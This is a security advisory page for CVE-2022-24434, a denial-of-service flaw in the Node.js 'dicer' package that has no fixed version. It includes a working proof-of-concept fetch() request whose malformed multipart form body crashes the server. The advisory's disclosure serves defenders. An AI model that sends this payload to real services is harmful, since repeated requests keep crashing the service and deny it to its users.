Homepage
About Snyk

Denial of Service (DoS) Affecting dicer package, versions *

0.0
high

Snyk CVSS

    Attack Complexity Low
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 0.11% (44th percentile)
Expand this section
NVD
7.5 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-DICER-2311764
  • published 19 May 2022
  • disclosed 7 Dec 2021
  • credit Aras Abbasi
Report a new vulnerability Found a mistake?

Introduced: 7 Dec 2021

CVE-2022-24434 Open this link in a new tab
CWE-400 Open this link in a new tab
First added by Snyk

How to fix?

There is no fixed version for dicer.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.

PoC: 

    fetch('form-image', {
      method: 'POST',
      headers: {
        ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
        ['content-length']: '145',
        host: '127.0.0.1:8000',
        connection: 'keep-alive',
      },
      body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
    });